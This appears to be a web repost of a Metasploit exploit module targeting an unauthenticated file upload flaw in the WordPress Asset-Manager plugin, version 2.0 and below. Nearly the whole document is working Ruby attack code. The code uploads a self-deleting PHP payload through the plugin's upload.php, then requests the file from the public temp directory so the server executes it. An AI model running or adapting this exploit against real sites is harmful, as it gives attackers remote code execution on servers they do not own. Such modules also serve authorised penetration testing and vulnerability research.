WordPress Asset-Manager PHP File Upload Vulnerability

Posted on 2012-12-31 09:22:33
This module, taken from the Metasploit exploit library, exploits a vulnerability found in the Asset-Manager plugin for WordPress, version 2.0 and below. It allows PHP file upload: a user can upload a file to a temp directory without authentication, which results in arbitrary code execution.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
      'Description'    => %q{
        This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82653' ],
          [ 'BID', '53809' ],
          [ 'EDB', '18993' ],
          [ 'URL', 'http://www.myhack58.com/' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'May 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def exploit
    # Normalise the base path so the plugin paths below can be appended directly.
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'
    peer = "#{rhost}:#{rport}"
    payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    # Build the multipart body; the plugin's upload.php reads the file from the
    # 'Filedata' form field and keeps the client-supplied filename.
    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{payload_name}")
    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    # A successful upload echoes the stored filename back in the response body.
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The file lands in the plugin's web-accessible temp directory, so a plain
    # GET is enough to have the server execute it.
    print_status("#{peer} - Executing payload #{payload_name}")
    res = send_request_raw({
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
      'method'  => 'GET'
    })

    if res and res.code != 200
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
    end
  end
end